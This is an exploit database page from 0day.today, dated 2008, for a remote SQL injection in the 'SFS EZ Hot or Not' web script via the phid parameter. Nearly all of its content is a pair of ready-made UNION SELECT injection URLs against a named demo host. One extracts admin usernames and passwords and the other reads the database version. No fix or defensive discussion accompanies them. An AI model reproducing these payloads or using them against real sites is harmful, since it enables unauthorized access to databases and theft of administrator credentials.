[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability

Author
d3b4g
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3996
Category
web applications
Date add
31-10-2008
Platform
unsorted
===========================================================
SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability
===========================================================


----------------------------------------------------------------
script : SFS EZ Hot ot Not 

script  :  http://www.scripts-for-sites.info

Risk : High

----------------------------------------------------------------

Discovered by : d3b4g

----------------------------------------------------------------
Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*


version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
----------------------------------------------------------------



#  0day.today [2024-12-24]  #